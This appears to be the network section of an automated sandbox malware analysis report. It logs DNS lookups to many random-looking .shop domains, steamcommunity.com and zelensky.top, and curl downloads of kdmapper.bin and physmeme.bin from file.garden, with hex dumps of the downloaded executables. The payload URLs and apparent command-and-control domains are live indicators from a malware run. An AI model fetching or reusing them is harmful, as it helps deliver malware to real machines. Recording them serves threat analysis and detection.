                                                                                                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                    Sep 30, 2024 18:25:28.353456974 CEST192.168.2.81.1.1.10x5954Standard query (0)file.gardenA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Sep 30, 2024 18:25:34.002553940 CEST192.168.2.81.1.1.10xb6f5Standard query (0)tiddymarktwo.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Sep 30, 2024 18:25:34.017153025 CEST192.168.2.81.1.1.10xc8a0Standard query (0)surveriysiop.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Sep 30, 2024 18:25:34.028835058 CEST192.168.2.81.1.1.10xffe7Standard query (0)captainynfanw.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Sep 30, 2024 18:25:34.039669037 CEST192.168.2.81.1.1.10x2796Standard query (0)tearrybyiwo.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Sep 30, 2024 18:25:34.053128004 CEST192.168.2.81.1.1.10x423Standard query (0)appleboltelwk.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Sep 30, 2024 18:25:34.065314054 CEST192.168.2.81.1.1.10x13d7Standard query (0)tendencerangej.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Sep 30, 2024 18:25:34.078527927 CEST192.168.2.81.1.1.10x3b91Standard query (0)fossillargeiw.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Sep 30, 2024 18:25:34.091139078 CEST192.168.2.81.1.1.10xcc0aStandard query (0)coursedonnyre.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Sep 30, 2024 18:25:34.101466894 CEST192.168.2.81.1.1.10xaa23Standard query (0)strappystyio.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Sep 30, 2024 18:25:34.113493919 CEST192.168.2.81.1.1.10xf9c9Standard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Sep 30, 2024 18:25:35.631908894 CEST192.168.2.81.1.1.10x6a5aStandard query (0)offeviablwke.siteA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Sep 30, 2024 18:26:01.576402903 CEST192.168.2.81.1.1.10xe599Standard query (0)zelensky.topA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Sep 30, 2024 18:26:12.960388899 CEST192.168.2.81.1.1.10x2b85Standard query (0)zelensky.topA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Sep 30, 2024 18:26:21.769926071 CEST192.168.2.81.1.1.10xdf31Standard query (0)zelensky.topA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Sep 30, 2024 18:26:46.367573023 CEST192.168.2.81.1.1.10x8d3aStandard query (0)zelensky.topA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Sep 30, 2024 18:26:52.854583025 CEST192.168.2.81.1.1.10xd00eStandard query (0)zelensky.topA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Sep 30, 2024 18:27:01.116763115 CEST192.168.2.81.1.1.10x6f5dStandard query (0)zelensky.topA (IP address)IN (0x0001)false
                                                                                                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                    Sep 30, 2024 18:25:28.364108086 CEST1.1.1.1192.168.2.80x5954No error (0)file.garden188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Sep 30, 2024 18:25:28.364108086 CEST1.1.1.1192.168.2.80x5954No error (0)file.garden188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Sep 30, 2024 18:25:34.013037920 CEST1.1.1.1192.168.2.80xb6f5Name error (3)tiddymarktwo.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Sep 30, 2024 18:25:34.025981903 CEST1.1.1.1192.168.2.80xc8a0Name error (3)surveriysiop.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Sep 30, 2024 18:25:34.038443089 CEST1.1.1.1192.168.2.80xffe7Name error (3)captainynfanw.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Sep 30, 2024 18:25:34.051625013 CEST1.1.1.1192.168.2.80x2796Name error (3)tearrybyiwo.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Sep 30, 2024 18:25:34.064023972 CEST1.1.1.1192.168.2.80x423Name error (3)appleboltelwk.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Sep 30, 2024 18:25:34.075895071 CEST1.1.1.1192.168.2.80x13d7Name error (3)tendencerangej.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Sep 30, 2024 18:25:34.089922905 CEST1.1.1.1192.168.2.80x3b91Name error (3)fossillargeiw.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Sep 30, 2024 18:25:34.100282907 CEST1.1.1.1192.168.2.80xcc0aName error (3)coursedonnyre.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Sep 30, 2024 18:25:34.110971928 CEST1.1.1.1192.168.2.80xaa23Name error (3)strappystyio.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Sep 30, 2024 18:25:34.122847080 CEST1.1.1.1192.168.2.80xf9c9No error (0)steamcommunity.com104.102.49.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Sep 30, 2024 18:25:35.656889915 CEST1.1.1.1192.168.2.80x6a5aNo error (0)offeviablwke.site104.21.84.213A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Sep 30, 2024 18:25:35.656889915 CEST1.1.1.1192.168.2.80x6a5aNo error (0)offeviablwke.site172.67.197.40A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Sep 30, 2024 18:26:01.644893885 CEST1.1.1.1192.168.2.80xe599Name error (3)zelensky.topnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Sep 30, 2024 18:26:12.968518972 CEST1.1.1.1192.168.2.80x2b85Name error (3)zelensky.topnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Sep 30, 2024 18:26:22.118455887 CEST1.1.1.1192.168.2.80xdf31Name error (3)zelensky.topnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Sep 30, 2024 18:26:46.377038956 CEST1.1.1.1192.168.2.80x8d3aName error (3)zelensky.topnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Sep 30, 2024 18:26:52.862545013 CEST1.1.1.1192.168.2.80xd00eName error (3)zelensky.topnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Sep 30, 2024 18:27:01.129597902 CEST1.1.1.1192.168.2.80x6f5dName error (3)zelensky.topnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    • file.garden
                                                                                                                                                                                                    • steamcommunity.com
                                                                                                                                                                                                    • offeviablwke.site
                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    0192.168.2.849706188.114.96.34432332C:\Windows\System32\curl.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2024-09-30 16:25:28 UTC104OUTGET /ZmE_ziOgiFXI9Y48/kdmapper.bin HTTP/1.1
                                                                                                                                                                                                    Host: file.garden
                                                                                                                                                                                                    User-Agent: curl/7.83.1
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    2024-09-30 16:25:29 UTC813INHTTP/1.1 200 OK
                                                                                                                                                                                                    Date: Mon, 30 Sep 2024 16:25:29 GMT
                                                                                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                                                                                    Content-Length: 2284739
                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                    x-powered-by: Express
                                                                                                                                                                                                    access-control-allow-origin: *
                                                                                                                                                                                                    content-security-policy: default-src file.garden linkh.at data: mediastream: blob: 'unsafe-inline' 'unsafe-eval'
                                                                                                                                                                                                    last-modified: Fri, 20 Sep 2024 19:21:00 GMT
                                                                                                                                                                                                    Cache-Control: max-age=14400
                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                    Age: 853448
                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=blevm4%2FQ8EQ4%2FjHQPFfF4ku02Bn5QDFzapPeI2b55q6V6HmoYrniroWoeb6s9gI58atO4AdwcEvjOds4gGRKYXWOsvt2DIGCS9tnaWMvfgR3Vmf8tZYz7TKSqYx9Dw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                    CF-RAY: 8cb591b40a2942e9-EWR
                                                                                                                                                                                                    2024-09-30 16:25:29 UTC556INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 78 5f 63 ed 3c 3e 0d be 3c 3e 0d be 3c 3e 0d be 88 a2 fc be 31 3e 0d be 88 a2 fe be b2 3e 0d be 88 a2 ff be 24 3e 0d be 9d 49 f0 be 3e 3e 0d be 9d 49 09 bf 2f 3e 0d be 9d 49 0e bf 2b 3e 0d be 9d 49 08 bf 08 3e 0d be 35 46 8e be 37 3e 0d be 35 46 9e be 3b 3e 0d be 3c 3e 0c be 29 3f 0d be c9 49 08 bf 0d 3e 0d be c9 49 0d bf 3d 3e 0d be c9 49 f2 be 3d 3e 0d be c9 49 0f bf 3d 3e 0d
                                                                                                                                                                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$x_c<><><>1>>$>I>>I/>I+>I>5F7>5F;><>)?I>I=>I=>I=>
                                                                                                                                                                                                    2024-09-30 16:25:29 UTC1369INData Raw: 20 00 00 60 2e 72 64 61 74 61 00 00 c0 ae 00 00 00 30 03 00 00 b0 00 00 00 20 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 20 47 02 00 00 e0 03 00 00 10 00 00 00 d0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 69 64 61 74 00 00 90 01 00 00 00 30 06 00 00 02 00 00 00 e0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f8 df 00 00 00 40 06 00 00 e0 00 00 00 e2 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 3c 23 00 00 00 20 07 00 00 24 00 00 00 c2 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                    Data Ascii: `.rdata0 @@.data G@.didat0@.rsrc@@@.reloc<# $@B
                                                                                                                                                                                                    2024-09-30 16:25:29 UTC1369INData Raw: 32 c0 5d c2 1c 00 55 8b ec 83 ec 4c ff 75 08 8d 4d b4 e8 2a 02 00 00 8b 4d f4 83 f9 08 73 0a 8b 45 0c 89 44 8d b4 ff 45 f4 8d 4d b4 e8 48 02 01 00 c9 c2 08 00 56 ff 74 24 08 8b f1 33 c0 89 06 89 46 04 89 46 08 89 46 0c 88 46 10 e8 5c 03 00 00 8b c6 5e c2 04 00 b8 35 26 43 00 e8 92 d7 01 00 51 51 53 56 8b f1 89 75 f0 e8 62 81 00 00 33 db c7 06 f8 35 43 00 8d 8e 38 10 00 00 89 5d fc e8 2d 4a 00 00 8d 8e f8 20 00 00 c6 45 fc 01 e8 27 ba 00 00 8d 8e 98 22 00 00 89 9e e8 21 00 00 89 9e ec 21 00 00 e8 4a 01 00 00 8d 8e e8 45 00 00 e8 3f 01 00 00 8b 4d 08 85 c9 c6 45 fc 04 0f 94 c0 89 9e d4 21 00 00 88 86 d0 21 00 00 85 c9 75 23 68 f0 92 00 00 e8 d7 d6 01 00 59 89 45 ec c6 45 fc 05 85 c0 74 09 8b c8 e8 91 a0 00 00 eb 06 8b c3 eb 02 8b c1 89 86 d4 21 00 00 8a 80
                                                                                                                                                                                                    Data Ascii: 2]ULuM*MsEDEMHVt$3FFFF\^5&CQQSVub35C8]-J E'"!!JE?ME!!u#hYEEt!
                                                                                                                                                                                                    2024-09-30 16:25:29 UTC1369INData Raw: 50 6a 39 e8 a5 fa ff ff 6a 02 b9 98 10 44 00 e8 3f 53 00 00 5e c2 04 00 53 56 8b f1 33 db 57 53 8b 3e 38 9e 3c 22 00 00 74 3d 8b 86 d8 6c 00 00 8b 4f 10 83 c0 14 53 50 ff 15 78 32 43 00 8b ce ff 57 10 8b ce e8 05 22 00 00 85 c0 74 15 83 be f4 21 00 00 75 75 0c 8b 44 24 10 39 58 04 0f 97 c0 eb 3c 32 c0 eb 38 e8 85 08 00 00 8b 4f 10 52 50 ff 15 78 32 43 00 8b ce ff 57 10 68 70 36 43 00 8b ce e8 3d 26 00 00 85 c0 74 11 ff 74 24 10 8b ce e8 db 04 00 00 84 c0 74 02 b3 01 8a c3 5f 5e 5b c2 04 00 80 b9 d4 6c 00 00 00 8b 54 24 04 74 1a 8b c2 f7 d8 83 e0 0f 03 d0 83 b9 c8 6c 00 00 03 75 05 83 c2 10 eb 03 83 c2 08 8b c2 c2 04 00 55 8b e9 80 bd ce 6c 00 00 00 75 04 32 c0 eb 41 8b 45 00 53 56 57 8b 70 14 8b ce ff 15 78 32 43 00 8b cd ff d6 ff 74 24 14 8b cd 8b f8 8b
                                                                                                                                                                                                    Data Ascii: Pj9jD?S^SV3WS>8<"t=lOSPx2CW"t!uuD$9X<28ORPx2CWhp6C=&tt$t_^[lT$tluUlu2AESVWpx2Ct$
                                                                                                                                                                                                    2024-09-30 16:25:29 UTC1369INData Raw: 02 eb 10 3c 01 75 04 6a 03 eb 08 2c 02 3c 02 77 03 6a 04 59 8b c1 c2 08 00 b8 73 26 43 00 e8 1e cd 01 00 83 ec 18 53 33 db 8b c1 89 45 f0 89 5d dc 89 5d e0 89 5d e4 89 5d e8 88 5d ec 53 53 8d 4d dc 89 5d fc 51 8b c8 e8 36 1d 00 00 84 c0 0f 84 83 00 00 00 56 57 8b 7d e0 8d 4d dc 6a 01 e8 97 f8 ff ff 8b 4d e0 8b 45 dc 8b 75 08 88 5c 01 ff 8d 47 01 50 8b ce e8 f6 f9 ff ff 8b 45 f0 83 b8 c8 6c 00 00 03 75 0f ff 76 04 ff 36 ff 75 dc e8 6f fd 00 00 eb 2d f6 80 0c 46 00 00 01 74 17 d1 ef 57 ff 36 ff 75 dc e8 19 fd 00 00 8b 06 33 c9 66 89 0c 78 eb 0d ff 76 04 ff 36 ff 75 dc e8 89 fc 00 00 ff 36 e8 11 1f 02 00 59 50 8b ce e8 9e f9 ff ff 5f b3 01 5e 8b 45 dc c7 45 fc 02 00 00 00 85 c0 74 19 80 7d ec 00 74 0c ff 75 e4 50 e8 19 d5 00 00 8b 45 dc 50 e8 f9 1e 02 00 59
                                                                                                                                                                                                    Data Ascii: <uj,<wjYs&CS3E]]]]]SSM]Q6VW}MjMEu\GPEluv6uo-FtW6u3fxv6u6YP_^EEt}tuPEPY
                                                                                                                                                                                                    2024-09-30 16:25:29 UTC1369INData Raw: 47 18 2b c2 83 f8 01 75 03 8d 69 01 8d b3 28 10 00 00 55 8b ce e8 13 fd ff ff 55 ff 36 8b cf e8 a9 a8 00 00 e9 90 04 00 00 8b cf e8 3b a9 00 00 8b c8 89 44 24 20 c1 e9 02 8d ab 08 21 00 00 80 e1 01 88 8b 06 21 00 00 8b c8 c1 e9 03 80 e1 01 88 8b 07 21 00 00 c6 83 08 22 00 00 00 c6 45 00 00 a8 01 74 29 8b cf e8 ff a8 00 00 8b f0 b8 ff 00 00 00 3b f0 72 02 8b f0 56 55 8b cf e8 4b a8 00 00 8b 44 24 20 c6 84 1e 08 21 00 00 00 a8 02 74 2b 8b cf e8 d2 a8 00 00 8b f0 b8 ff 00 00 00 3b f0 72 02 8b f0 56 8d 83 08 22 00 00 8b cf 50 e8 18 a8 00 00 c6 84 1e 08 22 00 00 00 80 bb 06 21 00 00 00 74 0d 8b cf e8 9e a8 00 00 89 83 08 23 00 00 80 bb 07 21 00 00 00 74 0d 8b cf e8 88 a8 00 00 89 83 0c 23 00 00 c6 83 05 21 00 00 01 e9 c4 03 00 00 8b cf e8 6f a8 00 00 8b cf 89
                                                                                                                                                                                                    Data Ascii: G+ui(UU6;D$ !!!"Et);rVUKD$ !t+;rV"P"!t#!t#!o
                                                                                                                                                                                                    2024-09-30 16:25:29 UTC1369INData Raw: 08 74 0c 8b cb e8 09 17 00 00 e9 e2 09 00 00 33 c9 8d 45 40 51 51 51 51 50 8b 83 d4 21 00 00 8d b3 38 10 00 00 05 24 60 00 00 50 6a 04 51 8b ce e8 1c 37 00 00 89 75 3c eb 03 88 4d 5a 57 8d 4d 1c e8 5b a4 00 00 83 7d 34 00 74 b7 8d 4d 1c e8 89 a2 00 00 0f b7 c0 8d 4d 1c 89 83 fc 21 00 00 c6 83 0c 22 00 00 00 e8 5a a2 00 00 8d 4d 1c 0f b6 f0 e8 66 a2 00 00 0f b7 c0 8d 4d 1c 89 83 04 22 00 00 c1 e8 0e 24 01 88 83 0c 22 00 00 e8 4a a2 00 00 0f b7 c8 89 8b 08 22 00 00 89 b3 00 22 00 00 3b cf 73 0c 8b cb e8 41 f7 ff ff e9 3f 09 00 00 8b c6 6a 02 5a 83 e8 73 74 2a 83 e8 01 74 1b 83 e8 06 74 09 83 e8 01 75 28 6a 05 eb 02 6a 03 58 89 83 00 22 00 00 8b f0 eb 17 89 93 00 22 00 00 8b f2 eb 0d 33 f6 c7 83 00 22 00 00 01 00 00 00 46 89 b3 f4 21 00 00 83 fe 75 74 0e 83
                                                                                                                                                                                                    Data Ascii: t3E@QQQQP!8$`PjQ7u<MZWM[}4tMM!"ZMfM"$"J"";sA?jZst*ttu(jjX""3"F!ut
                                                                                                                                                                                                    2024-09-30 16:25:29 UTC1369INData Raw: 02 00 40 59 3b f8 76 22 68 00 08 00 00 ff 75 54 8b cf 2b c8 51 8d 8d d0 df ff ff 03 c1 50 8b c1 8d 4d 00 57 50 e8 1a 3b 00 00 8b 4d 54 33 c0 66 39 01 75 14 6a 01 68 00 08 00 00 51 8d 85 d0 df ff ff 50 e8 30 d4 00 00 56 8b cb e8 a2 f2 ff ff e9 3f 01 00 00 68 00 08 00 00 51 8d 85 d0 df ff ff 50 e8 db ec 00 00 8b 46 0c 2b 45 50 f7 46 08 00 04 00 00 8d 78 e0 74 03 8d 78 d8 85 ff 0f 8e f6 00 00 00 8d 8e 28 10 00 00 57 e8 eb f1 ff ff 57 8d be 28 10 00 00 ff 37 8d 4d 1c e8 7a 9d 00 00 68 78 36 43 00 ff 75 54 e8 59 0f 02 00 59 59 85 c0 0f 85 c2 00 00 00 83 be 2c 10 00 00 14 0f 82 b5 00 00 00 8b 0f 0f b6 41 0b 99 8b f0 8b fa 0f b6 41 0a 0f a4 f7 08 99 c1 e6 08 03 f0 0f b6 41 09 13 fa 99 0f a4 f7 08 c1 e6 08 03 f0 0f b6 41 08 13 fa 99 0f a4 f7 08 c1 e6 08 03 f0 8b
                                                                                                                                                                                                    Data Ascii: @Y;v"huT+QPMWP;MT3f9ujhQP0V?hQPF+EPFxtx(WW(7Mzhx6CuTYYY,AAAA
                                                                                                                                                                                                    2024-09-30 16:25:29 UTC1369INData Raw: 0f 85 17 01 00 00 8b 83 d4 21 00 00 80 b8 24 61 00 00 00 75 0d e8 ae e7 00 00 c6 45 6b 00 84 c0 74 04 c6 45 6b 01 8b cb e8 a5 0a 00 00 8d 45 28 33 c9 50 51 ff b3 78 22 00 00 8d 45 18 50 8b 83 d4 21 00 00 8d bb 7c 22 00 00 57 05 24 60 00 00 8d b3 38 10 00 00 50 6a 05 51 8b ce e8 3e 2c 00 00 80 bb 74 22 00 00 00 74 7d 8d 83 8c 22 00 00 6a 08 50 8d 45 28 50 e8 33 d8 01 00 83 c4 0c 85 c0 74 64 80 7d 6b 00 8d 43 32 50 50 75 5e 68 83 00 00 00 e8 ee eb ff ff 8b 8b d4 21 00 00 81 c1 24 60 00 00 e8 35 be 00 00 8b cb e8 22 0a 00 00 8d 45 28 33 c9 50 51 ff b3 78 22 00 00 8d 45 18 50 8b 83 d4 21 00 00 57 05 24 60 00 00 50 6a 05 51 8b ce e8 c7 2b 00 00 80 bb 74 22 00 00 00 8d 83 8c 22 00 00 75 89 89 75 50 eb 22 6a 06 e8 93 eb ff ff 6a 0b b9 98 10 44 00 c6 83 dd 6c 00
                                                                                                                                                                                                    Data Ascii: !$auEktEkE(3PQx"EP!|"W$`8PjQ>,t"t}"jPE(P3td}kC2PPu^h!$`5"E(3PQx"EP!W$`PjQ+t""uuP"jjDl
                                                                                                                                                                                                    2024-09-30 16:25:29 UTC1369INData Raw: 88 46 18 e8 ff 93 00 00 8b 8b 04 22 00 00 33 d2 c1 e9 06 42 8b f8 c7 86 fc 10 00 00 02 00 00 00 8a 46 18 22 ca 88 8e f8 10 00 00 3a c2 75 08 89 96 fc 10 00 00 eb 0b 84 c0 75 07 83 a6 fc 10 00 00 00 8b 4e 08 8b c1 c1 e8 03 22 c2 88 86 98 10 00 00 8b c1 c1 e9 05 c1 e8 04 22 ca 22 c2 88 8e fa 10 00 00 83 7d 64 02 8b 4d 60 88 86 99 10 00 00 75 09 f6 c1 40 74 04 8a c2 eb 02 32 c0 88 86 f0 10 00 00 8a 86 94 10 00 00 22 c2 c1 e9 0a 88 86 f1 10 00 00 83 e1 0f 0f b6 c0 ba 00 00 02 00 d3 e2 f7 d8 1b c0 f7 d0 23 c2 89 86 f4 10 00 00 0f b6 86 9b 10 00 00 f7 d8 1b c0 83 e0 05 89 86 9c 10 00 00 b8 ff 1f 00 00 3b f8 72 02 8b f8 57 8d 85 8c df ff ff 50 8d 4d 30 e8 8a 92 00 00 c6 84 3d 8c df ff ff 00 8d 85 8c df ff ff 68 00 08 00 00 8d 7e 28 57 50 e8 4b e2 00 00 8b 4d 58
                                                                                                                                                                                                    Data Ascii: F"3BF":uuN"""}dM`u@t2"#;rWPM0=h~(WPKMX


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    1192.168.2.849709188.114.96.34432976C:\Windows\System32\curl.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2024-09-30 16:25:31 UTC104OUTGET /ZmE_ziOgiFXI9Y48/physmeme.bin HTTP/1.1
                                                                                                                                                                                                    Host: file.garden
                                                                                                                                                                                                    User-Agent: curl/7.83.1
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    2024-09-30 16:25:31 UTC814INHTTP/1.1 200 OK
                                                                                                                                                                                                    Date: Mon, 30 Sep 2024 16:25:31 GMT
                                                                                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                                                                                    Content-Length: 370176
                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                    x-powered-by: Express
                                                                                                                                                                                                    access-control-allow-origin: *
                                                                                                                                                                                                    content-security-policy: default-src file.garden linkh.at data: mediastream: blob: 'unsafe-inline' 'unsafe-eval'
                                                                                                                                                                                                    last-modified: Sun, 22 Sep 2024 19:01:04 GMT
                                                                                                                                                                                                    Cache-Control: max-age=14400
                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                    Age: 681774
                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wsOdPF1wPUSzDq5NvRB7tOyw816kyMBQO3P3fc7wM%2Fed4QJb6Kg3%2B8YLfUCBkN8Oal%2Bt5tkuK5ojyjuqdhCoPDzLWJxuTS5RVTMiBKuMscZ508aCLN34ejPMe4zU0g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                    CF-RAY: 8cb591c5aa1f4295-EWR
                                                                                                                                                                                                    2024-09-30 16:25:31 UTC555INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 aa 57 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 9c 05 00 00 08 00 00 00 00 00 00 be bb 05 00 00 20 00 00 00 c0 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 06 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELWf @ `
                                                                                                                                                                                                    2024-09-30 16:25:31 UTC1369INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7f 39 6d 95 5b 1c e7 2e 7b bf 94 a8 e9 8e 56 e9 5f 41 b3 ac 5f e4 ac 13 58 c3 bf b8 5b 6d 93 27 cd e6 23 51 f2 b8 9f 1c 93 a1 8d dd 2e 5b ca d0 8d 2b 48 f0 3c fc 85 66 5a f5 10 7c e6 ca aa 13 03 07 6d 26 d3 2e 1d a0 19 bf 79 aa bb 3b 4b 52 05 a6 94 af 37 a1 e7 53 c2 c0 6b 93 6d 3f f3 b7 38 08 a7 49 44 26 de 21 30 25 4e 21 5c 01 5c 06 cb 4c 5e 1e 1b cd 88 30 5c 11 b1 df cf 02 6a 7c a1 4d 85 ac fa af 1f 8a 8c 0f eb 4d ab 3b db 2a 86 71 ff b7 55 4f fa e8 21 27 b3 f3 25 2e 20 64 ba 45 ee 75 97 cb 8a 83 ea ee d2 51 2d 77 d4 a5 24 49 01 be e9 58 8f df d0 30 64 10 b5 f9 06 ea 88 a4 eb 9f 66 bd 24 7c 28 09 67 45 a9 4e 10 89 8c 33 a0 4a 99 0d 2a 54 b2 3f
                                                                                                                                                                                                    Data Ascii: 9m[.{V_A_X[m'#Q.[+H<fZ|m&.y;KR7Skm?8ID&!0%N!\\L^0\j|MM;*qUO!'%. dEuQ-w$IX0df$|(gEN3J*T?
                                                                                                                                                                                                    2024-09-30 16:25:31 UTC1369INData Raw: c2 32 1f a5 ff 5b 35 43 95 d0 93 a5 1d a0 c3 58 22 2c a4 8d eb c5 fb 07 a9 8c df 5f f7 3a 6b 24 02 f0 81 4a 34 0a bb 38 51 98 33 fa 65 0b 92 ff ae 2c c0 7c 6b 10 c6 53 66 e5 bd 95 5e 9e e7 4f 4d 77 1b 9f e6 d6 81 bd fd d1 7a ea 2d 8a f4 43 c6 c2 51 d2 6c 6c fa 8a f1 c2 1a c5 e5 40 96 c2 58 1b 78 42 71 52 38 56 21 63 6c c4 84 06 d5 0a 09 01 80 fb 8c ee 9d 40 14 bc d6 47 4b a8 ca c3 14 80 32 95 6c 0e f9 bf 9d 42 e4 df 07 88 e3 17 54 d4 eb 1f 8d fc fb 25 b2 aa 14 da ed 36 3e 13 c6 03 cb 68 dc 6b 69 86 6f bb b7 df 52 21 f8 a0 d8 79 dd f8 77 d5 8b 01 5a c2 cc 90 80 f0 bc b5 7b bc 30 3c bc 54 2c bc 22 03 9e 29 a1 f5 4a d4 54 08 f4 e9 58 f9 89 ca 72 b3 26 56 3d 3b 0d 3d e4 13 b4 4f ff ec ca de ec e9 38 17 7b be 01 fc fb 2f 3e e0 25 b2 a7 1d 38 f3 f5 0a f5 d2 f4
                                                                                                                                                                                                    Data Ascii: 2[5CX",_:k$J48Q3e,|kSf^OMwz-CQll@XxBqR8V!cl@GK2lBT%6>hkioR!ywZ{0<T,")JTXr&V=;=O8{/>%8
